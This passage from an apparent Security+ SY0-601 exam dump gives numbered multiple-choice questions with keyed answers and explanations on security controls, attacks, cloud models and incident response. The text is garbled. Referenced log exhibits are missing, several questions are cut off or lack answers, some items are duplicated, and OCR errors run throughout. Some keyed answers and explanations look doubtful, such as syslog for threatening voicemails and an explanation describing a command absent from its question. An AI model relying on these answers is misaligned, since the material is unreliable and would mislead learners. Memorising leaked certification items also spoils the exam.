IP address associated with a domain name in a DNS server's cache, causing clients to connect to the
attacker's server instead of the legitimate server. References: CompTIA Security+ SY0-601 Exam
Objectives: 3.2 Given a scenario, implement secure network architecture concepts.
166.A security administrator is setting up a SIEM to help monitor for notable events across the
enterprise.
Which of the following control types does this BEST represent?
A. Preventive
B. Compensating
C. Corrective
D. Detective
Answer: D
Explanation:
A SIEM is a security solution that helps detect security incidents by monitoring for notable events across
the enterprise. A detective control is a control that is designed to detect security incidents and respond to
them. Therefore, a SIEM represents a detective control.
Reference: CompTIA Security+ Study Guide, Exam SY0-601, Chapter 3: Architecture and Design
167.During a security assessment, a security finds a file with overly permissive permissions.
Which of the following tools will allow the analyst to reduce the permission for the existing users and
groups and remove the set-user-ID from the file?
A. 1s
B. chflags
C. chmod
D. lsof
E. setuid
Answer: C
Explanation:
The chmod command is used to change the permissions of a file or directory. The analyst can use
chmod to reduce the permissions for existing users and groups and remove the set-user-ID bit from the
file. References: ✑ CompTIA Security+ Study Guide Exam SY0-601, Chapter 6
168.A Chief information Officer is concerned about employees using company-issued laptops to steal
data when accessing network shares.
Which of the following should the company implement?
A. DLP
B. CASB
C. HIDS
D. EDR
E. UEFI
Answer: A
68 / 142
The safer , easier way to help you pass any IT exams.
Explanation:
Data Loss Prevention (DLP) can help prevent employees from stealing data by monitoring and
controlling access to sensitive data. DLP can also detect and block attempts to transfer sensitive data
outside of the organization, such as via email, file transfer, or cloud storage.
References: CompTIA Security+ Study Guide: Exam SY0-601, Chapter 10: Managing Identity and
Access, p. 465
169.A security analyst is running a vulnerability scan to check for missing patches during a suspected
security rodent During which of the following phases of the response process is this activity MOST likely
occurring?
A. Containment
B. Identification
C. Recovery
D. Preparation
Answer: B
Explanation:
Vulnerability scanning is a proactive security measure used to identify vulnerabilities in the network and
systems. References: CompTIA Security+ Study Guide 601, Chapter 4
170.A junior security analyst is reviewing web server logs and identifies the following pattern in the log
file:
Which ol the following types of attacks is being attempted and how can it be mitigated?
A. XSS. mplement a SIEM
B. CSRF. implement an IPS
C. Directory traversal implement a WAF
D. SQL infection, mplement an IDS
Answer: C
Explanation:
The attack being attempted is directory traversal, which is a web application attack that allows an
attacker to access files and directories outside of the web root directory. A WAF can help mitigate this
attack by detecting and blocking attempts to access files outside of the web root directory.
References: CompTIA Security+ Study Guide: Exam SY0-601, Chapter 4: Securing Application
Development and Deployment, p. 191
171.A client sent several inquiries to a project manager about the delinquent delivery status of some
critical reports. The project manager claimed the reports were previously sent via email, but then quickly
generated and backdated the reports before submitting them as plain text within the body of a new email
message thread.
Which of the following actions MOST likely supports an investigation for fraudulent submission?
A. Establish chain of custody.
B. Inspect the file metadata.
C. Reference the data retention policy.
D. Review the email event logs
69 / 142
The safer , easier way to help you pass any IT exams.
Answer: D
Explanation:
Reviewing the email event logs can support an investigation for fraudulent submission, as these logs can
provide details about the history of emails, including the message content, timestamps, and
sender/receiver information.
Reference: CompTIA Security+ Certification Exam Objectives, Exam SY0-601, 3.2 Given a scenario,
implement appropriate data security and privacy controls.
172.A security analyst reports a company policy violation in a case in which a large amount of sensitive
data is being downloaded after hours from various mobile devices to an external site. Upon further
investigation, the analyst notices that successful login attempts are being conducted with impossible
travel times during the same time periods when the unauthorized downloads are occurring. The analyst
also discovers a couple of WAPs are using the same SSID, but they have non-standard DHCP
configurations and an overlapping channel.
Which of the following attacks is being conducted?
A. Evil twin
B. Jamming
C. DNS poisoning
D. Bluesnarfing
E. DDoS
Answer: A
Explanation:
The attack being conducted is an Evil twin attack. An Evil twin attack involves creating a rogue wireless
access point (WAP) with the same Service Set Identifier (SSID) as a legitimate WAP to trick users into
connecting to it. Once connected, the attacker can intercept traffic or steal login credentials. The
successful login attempts with impossible travel times suggest that an attacker is using a stolen or
compromised credential to access the external site to which the sensitive data is being downloaded. The
non-standard DHCP configurations and overlapping channels of the WAPs suggest that the attacker is
using a rogue WAP to intercept traffic.
References: CompTIA Security+ Certification Exam Objectives, Exam Domain 1.0: Attacks, Threats, and
Vulnerabilities, 1.4 Compare and contrast types of attacks, p. 8
173.An organization is concerned about hackers potentially entering a facility and plugging in a remotely
accessible Kali Linux box.
Which of the following should be the first lines of defense against such an attack? (Select TWO)
A. MAC filtering
B. Zero trust segmentation
C. Network access control
D. Access control vestibules
E. Guards
F. Bollards
Answer: C,E
Explanation:
Network access control (NAC) is a technique that restricts access to a network based on the identity,
70 / 142
The safer , easier way to help you pass any IT exams.
role, device, location, or other criteria of the users or devices. NAC can prevent unauthorized or
malicious devices from connecting to a network and accessing sensitive data or resources.
Guards are physical security personnel who monitor and control access to a facility. Guards can prevent
unauthorized or malicious individuals from entering a facility and plugging in a remotely accessible
device.
174.A Chief Information Security Officer (CISO) is evaluating (he dangers involved in deploying a new
ERP system tor the company. The CISO categorizes the system, selects the
controls mat apply to the system, implements the controls, and then assesses the success of the
controls before authorizing the system.
Which of the following is the CISO using to evaluate Hie environment for this new ERP system?
A. The Diamond Model of Intrusion Analysis
B. CIS Critical Security Controls
C. NIST Risk Management Framevtoik
D. ISO 27002
Answer: C
Explanation:
The CISO is using the NIST Risk Management Framework (RMF) to evaluate the environment for the
new ERP system. The RMF is a structured process for managing risks that involves categorizing the
system, selecting controls, implementing controls, assessing controls, and authorizing the system.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 4: Risk
Management, pp. 188-191.
175.A third party asked a user to share a public key for secure communication.
Which of the following file formats should the user choose to share the key?
A. .pfx
B. .csr
C. .pvk
D. .cer
Answer: D
Explanation:
A user should choose the .cer file format to share a public key for secure communication. A .cer file is a
public key certificate that can be shared with third parties to enable secure communication.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 6:
Cryptography, pp. 301-302.
A public key is a cryptographic key that can be used to encrypt or verify data. A public key file is a file
that contains one or more public keys in a specific format.
There are different formats for public key files, depending on the application and the algorithm used.
Some of the common formats are:
✑ .pfx: This is a file format that stores a certificate and its private and public keys. It is also known as
PKCS#12 or Personal Information Exchange. It is used by some applications such as Microsoft Internet
Explorer and Outlook to import and export certificates and keys.1
✑ .csr: This is a file format that stores a Certificate Signing Request, which is a message sent to a
Certificate Authority (CA) to request a digital certificate. It contains the public key and some information
71 / 142
The safer , easier way to help you pass any IT exams.
about the identity of the requester. It is also known as PKCS#10 or Certification Request Syntax.2
✑ .pvk: This is a file format that stores a private key for Microsoft Authenticode code signing. It is used
with a .spc file that contains the certificate and public key.3
✑ .cer: This is a file format that stores a certificate, which is a document that binds a public key to an
identity. It is also known as DER or Distinguished Encoding Rules. It is used by some applications such
as OpenSSL and Java to read and write certificates.4
176.Which of the following controls would be the MOST cost-effective and time-efficient to deter
intrusions at the perimeter of a restricted, remote military training area? (Select TWO).
A. Barricades
B. Thermal sensors
C. Drones
D. Signage
E. Motion sensors
F. Guards
G. Bollards
Answer: A,D
Explanation:
Barricades and signage are the most cost-effective and time-efficient controls to deter intrusions at the
perimeter of a restricted, remote military training area.
References: ✑ CompTIA Security+ Study Guide Exam SY0-601, Chapter 7
Which of the following controls would be BEST to use to prevent such a breach in the future?
A. Password history
B. Account expiration
C. Password complexity
D. Account lockout
Answer: C
Explanation:
To prevent such a breach in the future, the BEST control to use would be Password complexity.
Password complexity is a security measure that requires users to create strong passwords that are
difficult to guess or crack. It can help prevent unauthorized access to systems and data by making it
more difficult for attackers to guess or crack passwords.
The best control to use to prevent a breach like the one shown in the logs is password complexity.
Password complexity requires users to create passwords that are harder to guess, by including a mix of
upper and lowercase letters, numbers, and special characters. In the logs, the attacker was able to
guess the user's password using a dictionary attack, which means that the password was not complex
72 / 142
The safer , easier way to help you pass any IT exams.
178.Hackers recently attacked a company's network and obtained several unfavorable pictures from the
Chief Executive Officer's workstation. The hackers are threatening to send the images to the press if a
ransom is not paid.
Which of the following is impacted the MOST?
A. Identify theft
B. Data loss
C. Data exfiltration
D. Reputation
Answer: D
Explanation:
The best option that describes what is impacted the most by the hackers’ attack and threat would be D.
Reputation. Reputation is the perception or opinion that others have about a person or an organization.
Reputation can affect the trust, credibility, and success of a person or an organization. In this scenario, if
the hackers send the unfavorable pictures to the press, it can damage the reputation of the Chief
Executive Officer and the company, and cause negative consequences such as loss of customers,
partners, investors, or employees.
179.A company is required to continue using legacy software to support a critical service.
Which of the following BEST explains a risk of this practice?
A. Default system configuration
B. Unsecure protocols
C. Lack of vendor support
D. Weak encryption
Answer: C
Explanation:
One of the risks of using legacy software is the lack of vendor support. This means that the vendor may
no longer provide security patches, software updates, or technical support for the software. This leaves
the software vulnerable to new security threats and vulnerabilities that could be exploited by attackers.
180.A Chief Information Officer is concerned about employees using company-issued laptops lo steal
data when accessing network shares.
Which of the following should the company Implement?
A. DLP
B. CASB
C. HIDS
D. EDR
E. UEFI
Answer: A
Explanation:
The company should implement Data Loss Prevention (DLP) to prevent employees from stealing data
when accessing network shares.
References: ✑ CompTIA Security+ Study Guide Exam SY0-601, Chapter 8
73 / 142
The safer , easier way to help you pass any IT exams.
181.An organization discovered a disgruntled employee exfiltrated a large amount of PII data by
uploading files.
Which of the following controls should the organization consider to mitigate this risk?
A. EDR
B. Firewall
C. HIPS
D. DLP
Answer: D
Explanation:
DLP stands for data loss prevention, which is a set of tools and processes that aim to prevent
unauthorized access, use, or transfer of sensitive data. DLP can help mitigate the risk of data exfiltration
by disgruntled employees or external attackers by monitoring and controlling data flows across
endpoints, networks, and cloud services. DLP can also detect and block attempts to copy, print, email,
upload, or download sensitive data based on predefined policies and rules.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.forcepoint.com/cyber-edu/data-loss-prevention-dlp
182.A retail company that is launching @ new website to showcase the company’s product line and
other information for online shoppers registered the following URLs:
* www companysite com
* shop companysite com
* about-us companysite com contact-us. companysite com secure-logon company site com
Which of the following should the company use to secure its website if the company is concerned with
convenience and cost?
A. A self-signed certificate
B. A root certificate
C. A code-signing certificate
D. A wildcard certificate
E. An extended validation certificate
Answer: D
Explanation:
The company can use a wildcard certificate to secure its website if it is concerned with convenience and
cost. A wildcard certificate can secure multiple subdomains, which makes it cost-effective and convenient
for securing the various registered domains.
The retail company should use a wildcard certificate if it is concerned with convenience and cost12. A
wildcard SSL certificate is a single SSL/TLS certificate that can provide significant time and cost savings,
particularly for small businesses. The certificate includes a wildcard character (*) in the domain name
field, and can secure multiple subdomains of the primary domain1
183.A help desk technician receives an email from the Chief Information Officer (C/O) asking for
documents. The technician knows the CIO is on vacation for a few weeks.
74 / 142
The safer , easier way to help you pass any IT exams.
Which of the following should the technician do to validate the authenticity of the email?
A. Check the metadata in the email header of the received path in reverse order to follow the email’s
path.
B. Hover the mouse over the CIO's email address to verify the email address.
C. Look at the metadata in the email header and verify the "From." line matches the CIO's email
address.
D. Forward the email to the CIO and ask if the CIO sent the email requesting the documents.
Answer: B
Explanation:
The “From” line in the email header can be easily spoofed or manipulated by an attacker to make it look
like the email is coming from the CIO’s email address. However, this does not mean that the email
address is actually valid or that the email is actually sent by the CIO. A better way to check the email
address is to hover over it and see if it matches the CIO’s email address exactly. This can help to spot
any discrepancies or typos that might indicate a phishing attempt. For example, if the CIO’s email
address is [email protected], but when you hover over it, it shows [email protected], then you know
that the email is not authentic and likely a phishing attempt.
185.Which of the following environments utilizes dummy data and is MOST likely to be installed locally
on a system that allows code to be assessed directly and modified easily with each build?
A. Production
B. Test
C. Staging
D. Development
Answer: D
Explanation:
A development environment is the environment that is used to develop and test software. It is typically
installed locally on a system that allows code to be assessed directly and modified easily with each build.
In this environment, dummy data is often utilized to test the software's functionality.
Reference: CompTIA Security+ Study Guide, Exam SY0-601, Chapter 3: Architecture and Design
186.An information security manager for an organization is completing a PCI DSS self-assessment for
the first time.
Which of the is following MOST likely reason for this type of assessment?
75 / 142
The safer , easier way to help you pass any IT exams.
187.Which of the following environments would MOST likely be used to assess the execution of
component parts of a system at both the hardware and software levels and to measure performance
characteristics?
A. Test
B. Staging
C. Development
D. Production
Answer: A
Explanation:
The test environment is used to assess the execution of component parts of a system at both the
hardware and software levels and to measure performance characteristics.
References: CompTIA Security+ Study Guide 601, Chapter 2
188.A Chief Information Officer receives an email stating a database will be encrypted within 24 hours
unless a payment of $20,000 is credited to the account mentioned In the email.
This BEST describes a scenario related to:
A. whaling.
B. smishing.
C. spear phishing
D. vishing
Answer: C
Explanation:
The scenario of receiving an email stating a database will be encrypted unless a payment is made is an
example of spear phishing.
References: CompTIA Security+ Study Guide by Emmett Dulaney, Chapter 2: Threats, Attacks, and
Vulnerabilities, Social Engineering
189.Sales team members have been receiving threatening voicemail messages and have reported these
incidents to the IT security team.
Which of the following would be MOST appropriate for the IT security team to analyze?
A. Access control
B. Syslog
C. Session Initiation Protocol traffic logs
76 / 142
The safer , easier way to help you pass any IT exams.
D. Application logs
Answer: B
Explanation:
Syslogs are log files that are generated by devices on the network and contain information about
network activity, including user logins, device connections, and other events. By analyzing these logs,
the IT security team can identify the source of the threatening voicemail messages and take the
necessary steps to address the issue
190.Which Of the following security controls can be used to prevent multiple from using a unique card
swipe and being admitted to a entrance?
A. Visitor logs
B. Faraday cages
C. Access control vestibules
D. Motion detection sensors
Answer: C
Explanation:
Access control vestibules are physical security controls that consist of two sets of doors or gates that
create a small enclosed space between them. Only one door or gate can be opened at a time, and only
one person can enter or exit the vestibule at a time. Access control vestibules can prevent multiple
people from using a unique card swipe and being admitted to a secure entrance, as they require each
person to authenticate individually and prevent tailgating or piggybacking.
191.An organization recently released a zero-trust policy that will enforce who is able to remotely access
certain data. Authenticated users who access the data must have a need to know, depending on their
level of permissions.
Which of the following is the first step the organization should take when implementing the policy?
A. Determine a quality CASB solution.
B. Configure the DLP policies by user groups.
C. Implement agentless NAC on boundary devices.
D. Classify all data on the file servers.
Answer: D
Explanation:
zero trust is a security strategy that assumes breach and verifies each request as though it originates
from an untrusted network12. A zero trust policy is a set of “allow rules” that specify conditions for
accessing certain resources3.
According to one source4, the first step in implementing a zero trust policy is to identify and classify all
data and assets in the organization. This helps to determine the level of sensitivity and risk associated
with each resource and apply appropriate access controls. Classifying all data on the file servers is the
first step in implementing a zero trust policy because it helps to determine the level of sensitivity and risk
associated with each resource and apply appropriate access controls.
Reference: Zero Trust implementation guidance | Microsoft Learn
192.Which of the following should be addressed first on security devices before connecting to the
network?
77 / 142
The safer , easier way to help you pass any IT exams.
A. Open permissions
B. Default settings
C. API integration configuration
D. Weak encryption
Answer: B
Explanation:
Before connecting security devices to the network, it is crucial to address default settings first.
Manufacturers often ship devices with default settings that include default usernames, passwords, and
configurations. These settings are widely known and can be easily exploited by attackers. Changing
default settings helps to secure the device and prevent unauthorized access.
Reference: CompTIA Security+ SY0-501 Exam Objectives, Section 3.2: "Given a scenario, implement
secure systems design." (https://www.comptia.jp/pdf/Security%2B%20SY0-
501%20Exam%20Objectives.pdf)
193.A financial institution recently joined a bug bounty program to identify security issues in the
institution's new public platform.
Which of the following best describes who the institution is working with to identify security issues?
A. Script kiddie
B. Insider threats
C. Malicious actor
D. Authorized hacker
Answer: D
Explanation:
An authorized hacker, also known as an ethical hacker or a white hat hacker, is someone who uses their
skills and knowledge to find and report security issues in a system or application with the permission of
the owner. An authorized hacker follows the rules and guidelines of the bug bounty program and does
not cause any harm or damage to the system or its users.
194.An organization recently released a software assurance policy that requires developers to run code
scans each night on the repository. After the first night, the security team alerted the developers that
more than 2,000 findings were reported and need to be addressed.
Which of the following is the MOST likely cause for the high number of findings?
A. The vulnerability scanner was not properly configured and generated a high number of false positives
B. Third-party libraries have been loaded into the repository and should be removed from the codebase.
C. The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for
the same issue.
D. The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated.
Answer: A
Explanation:
The most likely cause for the high number of findings is that the vulnerability scanner was not properly
configured and generated a high number of false positives. False positive results occur when a
vulnerability scanner incorrectly identifies a non-vulnerable system or application as being vulnerable.
This can happen due to incorrect configuration, over-sensitive rule sets, or outdated scan databases.
https://www.professormesser.com/security-plus/sy0-601/sy0-601-video/sy0-601-comptia-security-plus-
78 / 142
The safer , easier way to help you pass any IT exams.
course/
195.A security engineer is concerned the strategy for detection on endpoints is too heavily dependent on
previously defined attacks. The engineer wants a tool that can monitor for changes to key files and
network traffic for the device.
Which of the following tools should the engineer select?
A. HIDS
B. AV
C. NGF-W
D. DLP
Answer: A
Explanation:
The security engineer should select a Host Intrusion Detection System (HIDS) to address the concern.
HIDS monitors and analyzes the internals of a computing system, such as key files and network traffic,
for any suspicious activity. Unlike antivirus software (AV), which relies on known signatures of malware,
HIDS can detect anomalies, policy violations, and previously undefined attacks by monitoring system
behavior and the network traffic of the device.
References:
1. CompTIA Security+ Certification Exam Objectives (SY0-601):
https://www.comptia.jp/pdf/Security%2B%20SY0-601%20Exam%20Objectives.pdf
2. Scarfone, K., & Mell, P. (2007). Guide to Intrusion Detection and Prevention Systems (IDPS):
Recommendations of the National Institute of Standards and Technology. NIST Special Publication 800-
94. https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-94.pdf
196.A security analyst is investigating a report from a penetration test. During the penetration test,
consultants were able to download sensitive data from a back-end server. The back-end server was
exposing an API that should have only been available from the companVs mobile application.
After reviewing the back-end server logs, the security analyst finds the following entries
Which of the following is the most likely cause of the security control bypass?
A. IP address allow list
B. user-agent spoofing
C. WAF bypass
D. Referrer manipulation
Answer: B
Explanation:
User-agent spoofing is a technique that allows an attacker to modify the user-agent header of an HTTP
request to impersonate another browser or device12. User-agent spoofing can be used to bypass
security controls that rely on user-agent filtering or validation12. In this case, the attacker spoofed the
user-agent header to match the company’s mobile application, which was allowed to access the back-
end server’s API2.
79 / 142
The safer , easier way to help you pass any IT exams.
197.An organization wants to quickly assess how effectively the IT team hardened new laptops.
Which of the following would be the best solution to perform this assessment?
A. Install a SIEM tool and properly configure it to read the OS configuration files.
B. Load current baselines into the existing vulnerability scanner.
C. Maintain a risk register with each security control marked as compliant or non-compliant.
D. Manually review the secure configuration guide checklists.
Answer: B
Explanation:
A vulnerability scanner is a tool that can scan devices and systems for known vulnerabilities,
misconfigurations, and compliance issues. By loading the current baselines into the scanner, the
organization can compare the actual state of the new laptops with the desired state and identify any
deviations or weaknesses. This is a quick and automated way to assess the hardening of the new
laptops.
198.A police department is using the cloud to share information city officials.
Which of the cloud models describes this scenario?
A. Hybrid
B. private
C. pubic
D. Community
Answer: D
Explanation:
A community cloud model describes a scenario where a cloud service is shared among multiple
organizations that have common goals, interests, or requirements. A community cloud can be hosted by
one of the organizations, a third-party provider, or a combination of both. A community cloud can offer
benefits such as cost savings, security, compliance, and collaboration. A police department using the
cloud to share information with city officials is an example of a community cloud model.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.ibm.com/cloud/learn/community-cloud
199.A company was recently breached Pan of the company's new cybersecurity strategy is to centralize?
the togs horn all security devices.
Which of the following components forwards the logs to a central source?
A. Log enrichment
B. Log queue
C. Log parser
D. Log collector
Answer: D
Explanation:
A log collector is a component that forwards the logs from all security devices to a central source. A log
collector can be a software tool or a hardware appliance that collects logs from various sources, such as
firewalls, routers, servers, applications, or endpoints. A log collector can also perform functions such as
80 / 142
The safer , easier way to help you pass any IT exams.
log filtering, parsing, aggregation, normalization, and enrichment. A log collector can help centralize
logging by sending the collected logs to a central log server or a security information and event
management (SIEM) system for further analysis and correlation.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://geekflare.com/open-source-centralized-logging/
200.An attacker is using a method to hide data inside of benign files in order to exfiltrate confidential
data.
Which of the following is the attacker most likely using?
A. Base64 encoding
B. Steganography
C. Data encryption
D. Perfect forward secrecy
Answer: B
Explanation:
Steganography is a technique for hiding data inside of benign files such as images, audio, or video. This
can be used to exfiltrate confidential data without raising suspicion or detection.
References: How to Hide Files Inside Files [Images, Folder] - Raymond.CC Blog; How to Hide Data in a
Secret Text File Compartment - How-To Geek; How to Hide Data Within an Image - Medium
201.Which of the following allow access to remote computing resources, a operating system. and
centrdized configuration and data
A. Containers
B. Edge computing
C. Thin client
D. Infrastructure as a service
Answer: C
Explanation:
Thin clients are devices that have minimal hardware and software components and rely on a remote
server to provide access to computing resources, an operating system, and centralized configuration and
data. Thin clients can reduce the cost, complexity, and security risks of managing multiple devices.
81 / 142
The safer , easier way to help you pass any IT exams.
you have), and a fingerprint scan (something you are) for authentication.
Reference: CompTIA Security+ Study Guide (SY0-601) 7th Edition by Emmett Dulaney, Chuck Easttom
Note: There could be other options as well that could satisfy the three-factor authentication requirements
as per the organization's security policies.
203.Which of the following procedures would be performed after the root cause of a security incident has
been identified to help avoid future incidents from occurring?
A. Walk-throughs
B. Lessons learned
C. Attack framework alignment
D. Containment
Answer: B
Explanation:
After the root cause of a security incident has been identified, it is important to take the time to analyze
what went wrong and how it could have been prevented. This process is known as “lessons learned” and
allows organizations to identify potential improvements to their security processes and protocols.
Lessons learned typically involve a review of the incident
and the steps taken to address it, a review of the security systems and procedures in place, and an
analysis of any potential changes that can be made to prevent similar incidents from occurring in the
future.
204.A security operations technician is searching the log named /vax/messages for any events that were
associated with a workstation with the IP address 10.1.1.1.
Which of the following would provide this information?
A. cat /var/messages | grep 10.1.1.1
B. grep 10.1.1.1 | cat /var/messages
C. grep /var/messages | cat 10.1.1.1
D. cat 10.1.1.1 | grep /var/messages
Answer: A
Explanation:
the cat command reads the file and streams its content to standard output. The | symbol connects the
output of the left command with the input of the right command. The grep command returns all lines that
match the regex. The cut command splits each line into fields based on a delimiter and extracts a
specific field.
205.Which of the following processes would most likely help an organization that has conducted an
incident response exercise to improve performance and identify challenges?
A. Lessons learned
B. Identification
C. Simulation
D. Containment
Answer: A
Explanation:
Lessons learned is a process that would most likely help an organization that has conducted an incident
82 / 142
The safer , easier way to help you pass any IT exams.
response exercise to improve performance and identify challenges. Lessons learned is a process that
involves reviewing and evaluating the incident response exercise to identify what went well, what went
wrong, and what can be improved. Lessons learned can help an organization enhance its incident
response capabilities, address any gaps or weaknesses, and update its incident response plan
accordingly.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901
206.A company is switching to a remote work model for all employees. All company and employee
resources will be in the cloud. Employees must use their personal computers to access the cloud
computing environment. The company will manage the operating system.
Which of the following deployment models is the company implementing?
A. CYOD
B. MDM
C. COPE
D. VDI
Answer: D
Explanation:
According to Professor Messer’s video1, VDI stands for Virtual Desktop Infrastructure and it is a
deployment model where employees use their personal computers to access a virtual machine that runs
the company’s operating system and applications.
In the scenario described, the company is implementing a virtual desktop infrastructure (VDI)
deployment model [1]. This allows employees to access the cloud computing environment using their
personal computers, while the company manages the operating system. The VDI model is suitable for
remote work scenarios because it provides secure and centralized desktop management, while allowing
employees to access desktops from any device.
207.A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new
ERP system for the company. The CISO categorizes the system, selects the controls that apply to the
system, implements the controls, and then assesses the success of the controls before authorizing the
system.
Which of the following is the CISO using to evaluate the environment for this new ERP system?
A. The Diamond Model of Intrusion Analysis
B. CIS Critical Security Controls
C. NIST Risk Management Framework
D. ISO 27002
Answer: C
Explanation:
The NIST Risk Management Framework (RMF) is a process for evaluating the security of a system and
implementing controls to reduce potential risks associated with it. The RMF process involves
categorizing the system, selecting the controls that apply to the system, implementing the controls, and
then assessing the success of the controls before authorizing the system. For more information on the
83 / 142
The safer , easier way to help you pass any IT exams.
NIST Risk Management Framework and other security processes, refer to the CompTIA Security+ SY0-
601 Official Text Book and Resources.
208.A company would like to protect credit card information that is stored in a database from being
exposed and reused. However, the current POS system does not support encryption.
Which of the following would be BEST suited to secure this information? (Give me related explanation
and references from CompTIA Security+ SY0-601 documents for Correct answer option)
A. Masking
B. Tokenization
C. DLP
D. SSL/TLS
Answer: B
Explanation:
Tokenization replaces sensitive data with non-sensitive data, such as a unique identifier. This means that
the data is still present in the system, but the sensitive information itself is replaced with the token.
Tokenization is more secure than masking, which only obscures the data but does not eliminate it. DLP is
not suitable for this task, as it is designed to prevent the loss or leakage of data from the system.
SSL/TLS can be used to secure the transmission of data, but it cannot prevent the data itself from being
exposed or reused. For more information, please refer to CompTIA Security+ SY0-601 Exam Objectives,
Section 3.3: Explain the security purpose of authentication, authorization and accounting (AAA) services,
and Section 4.7: Explain the purpose and characteristics of various types of encryption.
209.Multiple beaconing activities to a malicious domain have been observed. The malicious domain is
hosting malware from various endpoints on the network.
Which of the following technologies would be best to correlate the activities between the different
endpoints?
A. Firewall
B. SIEM
C. IPS
D. Protocol analyzer
Answer: B
Explanation:
SIEM stands for Security Information and Event Management, which is a technology that collects,
analyzes, and correlates data from multiple sources, such as firewall logs, IDS/IPS alerts, network
devices, applications, and endpoints. SIEM provides real-time monitoring and alerting of security events,
as well as historical analysis and reporting for compliance and forensic purposes.
A SIEM technology would be best to correlate the activities between the different endpoints that are
beaconing to a malicious domain. A SIEM can detect the malicious domain by comparing it with threat
intelligence feeds or known indicators of compromise (IOCs). A SIEM can also identify the endpoints that
are communicating with the malicious domain by analyzing the firewall logs and other network traffic
data. A SIEM can alert the security team of the potential compromise and provide them with relevant
information for investigation and remediation.
A security analyst reviews web server logs and notices the following line:
104.35. 45.53 -
84 / 142
The safer , easier way to help you pass any IT exams.
210.Which of the following best describes when an organization Utilizes a read-to-use application from a
cloud provider?
A. IaaS
B. SaaS
C. PaaS
D. XaaS
Answer: B
Explanation:
SaaS stands for software as a service, which is a cloud computing model that provides ready-to-use
applications over the internet. SaaS applications are hosted and managed by a cloud provider who also
handles software updates, maintenance, security, and scalability. SaaS users can access the
applications through a web browser or a mobile app without installing any software on their devices.
SaaS applications are typically offered on a subscription or pay-per-use basis. Examples of SaaS
applications include email services, online office suites, customer relationship management (CRM)
systems, and video conferencing platforms.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.ibm.com/cloud/learn/software-as-a-service
211.A security analyst is using OSINT to gather information to verify whether company data is available
publicly.
Which of the following is the BEST application for the analyst to use?
A. theHarvester
B Cuckoo
B. Nmap
C. Nessus
Answer: A
Explanation:
The Harvester is a reconnaissance tool that is used to gather information about a target organization,
such as email addresses, subdomains, and IP addresses. It can also be used to gather information
about a target individual, such as email addresses, phone numbers, and social media profiles. The
Harvester is specifically designed for OSINT (Open-Source Intelligence) and it can be used to discover
publicly available information about a target organization or individual.
85 / 142
The safer , easier way to help you pass any IT exams.
D. SDV
Answer: C
Explanation:
SDN stands for software-defined networking, which is an approach to networking that uses software-
based controllers or application programming interfaces (APIs) to communicate with underlying
hardware infrastructure and direct traffic on a network. SDN decouples the network control plane from
the data plane, enabling centralized management and programmability of network resources. SDN can
help an engineer use scripting to deploy a network in a cloud environment by allowing them to define
and automate network policies, configurations, and services through software commands.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.cisco.com/c/en/us/solutions/software-defined-networking/overview.html
213.A security team is engaging a third-party vendor to do a penetration test of a new proprietary
application prior to its release.
Which of the following documents would the third-party vendor most likely be required to review and
sign?
A. SLA
B. NDA
C. MOU
D. AUP
Answer: B
Explanation:
NDA stands for Non-Disclosure Agreement, which is a legal contract that binds the parties to keep
confidential information secret and not to disclose it to unauthorized parties. A third-party vendor who is
doing a penetration test of a new proprietary application would most likely be required to review and sign
an NDA to protect the intellectual property and trade secrets of the security team.
214.A Chief Information Security Officer (CISO) wants to implement a new solution that can protect
against certain categories of websites, whether the employee is in the offer or away.
Which of the following solutions should the CISO implement?
A. VAF
B. SWG
C. VPN
D. WDS
Answer: B
Explanation:
A secure web gateway (SWG) is a solution that can filter and block malicious or inappropriate web traffic
based on predefined policies. It can protect users from web-based threats, such as malware, phishing, or
ransomware, whether they are in the office or away. An SWG can be deployed as a hardware appliance,
a software application, or a cloud service.
References: https://www.comptia.org/content/guides/what-is-a-secure-web-gateway
86 / 142
The safer , easier way to help you pass any IT exams.
215.The new Chief Information Security Officer at a company has asked the security learn to implement
stronger user account policies.
The new policies require:
• Users to choose a password unique to their last ten passwords
• Users to not log in from certain high-risk countries
Which of the following should the security team implement? (Select two).
A. Password complexity
B. Password history
C. Geolocation
D. Geospatial
E. Geotagging
F. Password reuse
Answer: B,C
Explanation:
Password history is a policy that prevents users from reusing their previous passwords. This can reduce
the risk of password cracking or compromise. Geolocation is a policy that restricts users from logging in
from certain locations based on their IP address. This can prevent unauthorized access from high-risk
countries or regions.
References: https://www.comptia.org/content/guides/what-is-identity-and-access-management
216.While reviewing the /etc/shadow file, a security administrator notices files with the same values.
Which of the following attacks should the administrator be concerned about?
A. Plaintext
B. Birthdat
C. Brute-force
D. Rainbow table
Answer: D
Explanation:
Rainbow table is a type of attack that should concern a security administrator when reviewing the
/etc/shadow file. The /etc/shadow file is a file that stores encrypted passwords of users in a Linux
system. A rainbow table is a precomputed table of hashes and their corresponding plaintext values that
can be used to crack hashed passwords. If an attacker obtains a copy of the /etc/shadow file, they can
use a rainbow table to find the plaintext passwords of users.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.geeksforgeeks.org/rainbow-table-in-cryptography/
217.A security administrator is compiling information from all devices on the local network in order to
gain better visibility into user activities.
Which of the following is the best solution to meet this objective?
A. SIEM
B. HIDS
C. CASB
87 / 142
The safer , easier way to help you pass any IT exams.
D. EDR
Answer: A
Explanation:
SIEM stands for Security Information and Event Management, which is a solution that can collect,
